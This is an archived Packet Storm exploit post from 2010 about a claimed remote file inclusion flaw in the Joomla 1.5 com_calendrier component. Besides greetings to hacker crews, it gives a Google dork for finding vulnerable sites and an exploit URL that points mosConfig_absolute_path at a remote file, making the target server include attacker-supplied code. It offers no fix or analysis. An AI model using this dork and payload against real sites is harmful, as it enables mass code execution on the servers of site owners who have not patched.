Joomla Calendrier Remote File Inclusion

2010-10-23T00:00:00
ID PACKETSTORM:95142
Type packetstorm
Reporter jos_ali_joe
Modified 2010-10-23T00:00:00

Description

                                        
                                            `=========================================================  
Joomla Component com_calendrier RFI Vulnerability  
=========================================================  
  
[+]Title : Joomla Component com_calendrier RFI Vulnerability  
[+]Author : jos_ali_joe  
[+]Contact : josalijoe@yahoo.com  
[+]Home : http://josalijoe.wordpress.com/   
  
  
########################################################################   
  
Dork : inurl:index.php?option="com_calendrier"  
  
########################################################################   
  
[ Software Information ]  
  
########################################################################  
[+] Vendor : http://extensions.joomla.org/  
[+] Archive : http://extensions.joomla.org/extensions/calendars-a-events  
[+] version : Joomla 1.5  
[+] Vulnerability : RFI  
[+] Dork : com_calendrier  
########################################################################  
  
==========================================================================  
  
RFI Exploit   
  
Exploit : http://example.com/index.php?option=com_calendrier&Itemid=&mosConfig_absolute_path=[ packetstormsecurity ]  
  
==========================================================================  
  
####################################################################################  
  
a little story from my  
  
before thank you for the admin and staff packetstorm security  
  
who already receive exploit archive from newbie jos_ali_joe  
  
I do not have the kind of teacher or her  
  
My teacher just google  
  
and my brother who has been guiding me. N4ck0 - Aury - TeRRenJr - ArRay  
  
I will create a spirit of looking for bugs / dork and submit the packetstorm security.  
  
Thanks for packetstorm security \m/  
  
####################################################################################  
  
Thanks :  
  
./kaMtiEz – ibl13Z – Xrobot – tukulesto – R3m1ck – jundab - asickboys- Vyc0d – Yur4kha - XPanda - eL Farhatz  
  
./ArRay – akatsuchi – K4pt3N – Gameover – antitos – yuki – pokeng – ffadill - Alecs - v3n0m - RJ45  
  
./Kiddies – pL4nkt0n – chaer newbie – andriecom – Abu_adam – Petimati - hakz – Virgi – Anharku - a17z a.k.a maho  
  
  
./Me Family ATeN4 :  
  
./N4ck0 - Aury - TeRRenJr - Rafael - aphe-aphe   
  
Greets For :  
  
./Devilzc0de crew – Kebumen Cyber – Explore Crew – Indonesian Hacker - Byroe Net - Yogyacarderlink - Hacker Newbie - Wannabe Hacker   
  
My Team : ./Indonesian Coder  
  
Special Thanks To :  
  
/. Admin and Staff packetstorm security  
  
`